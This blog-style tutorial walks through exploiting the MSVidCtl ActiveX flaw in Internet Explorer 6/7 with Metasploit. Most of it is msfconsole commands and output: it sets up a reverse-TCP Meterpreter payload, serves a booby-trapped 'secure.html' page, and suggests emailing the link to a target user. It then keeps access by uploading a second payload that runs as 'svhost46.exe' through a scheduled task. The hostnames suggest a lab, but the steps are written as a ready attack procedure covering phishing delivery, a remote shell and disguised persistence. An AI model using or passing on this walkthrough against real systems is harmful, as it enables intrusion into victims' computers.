Exploiting MSVidCtl ActiveX with Metasploit

Recently an exploit for MSVidCtl component of Microsoft DirectShow was found that caused a memory corruption on Internet Explorer 6 and 7 giving shell on the target box under the IE process. Trancer contributed a exploit module to Metasploit to exploit this vulnerability by creating a crafted GIF image. I would like to cover simple example on using the exploit and changing to another Meterpreter session so when the targeted Internet Explorer is killed by the user we do not lose the shell access. Migrate sadly does not work since the process is left in such an unstable state that trying to migrate the Meterpreter session tends to kill the session.

We start by running msfconsole after updating Metasploit to the latest version of Metsaploit dev version:

carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole 
[sudo] password for carlos: 
                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   
       =[ msf v3.3-dev
+ -- --=[ 384 exploits - 261 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 166 aux
msf >

 

We load the exploit module and set our Meterpreter payload and look at the options we have available:

msf > use exploit/windows/browser/msvidctl_mpeg2 
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > show options
Module options:
   Name     Current Setting  Required  Description                                          
   ----     ---------------  --------  -----------                                          
   SRVHOST  0.0.0.0          yes       The local host to listen on.                         
   SRVPORT  8080             yes       The local port to listen on.                         
   SSL      false            no        Use SSL                                              
   URIPATH                   no        The URI to use for this exploit (default is random)  
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description                           
   ----      ---------------  --------  -----------                           
   EXITFUNC  process          yes       Exit technique: seh, thread, process  
   LHOST                      yes       The local address                     
   LPORT     4444             yes       The local port                        
Exploit target:
   Id  Name                                        
   --  ----                                        
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0  

 

We set our variables for the PAYLOAD and Exploit module:

msf exploit(msvidctl_mpeg2) > set SRVPORT 80
SRVPORT => 80
msf exploit(msvidctl_mpeg2) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(msvidctl_mpeg2) > set URIPATH secure.html
URIPATH => secure.html
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/secure.html
[*]  Local IP: http://192.168.1.158:80/secure.html
[*] Server started.

Now we have the exploit serving a HTML file with the GIF to exploit a target. You can send the link to a target user within an email or thru any other method and once the user clicks the link and opens Internet explorer it gets exploited giving use shell:

[*] Sending HTML to 192.168.1.139:1126...
[*] Sending exploit to 192.168.1.139:1126...
[*] Sending GIF to 192.168.1.139:1126...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (206848 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1127)
msf exploit(msvidctl_mpeg2) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > 

 

This will hang the Internet Explorer on the target machine. We want to migrate as quickly as possible so we can preserve the access, in my tests running migrate caused problems killing so I chose to use the scheduleme Meterpreter script to upload a Meterpreter payload and use the scheduler service to run the payload immediately and get a secondary shell:

 

meterpreter > run scheduleme -i -e ./rmeter.exe 
[*] Uploadingd ./rmeter.exe....
[*] ./rmeter.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe to run now.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck36 /F
meterpreter > 
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (206848 bytes)
[*] Meterpreter session 2 opened (192.168.1.158:4444 -> 192.168.1.139:1128)
meterpreter > 
Background session 1? [y/N]  
msf exploit(msvidctl_mpeg2) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer: WINXPLAB01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > 

 

We accessed the secondary shell by doing a Crtl-Z and backgrounding the initial session and interacting with the second one. This can be automated by setting the AutoRunScript.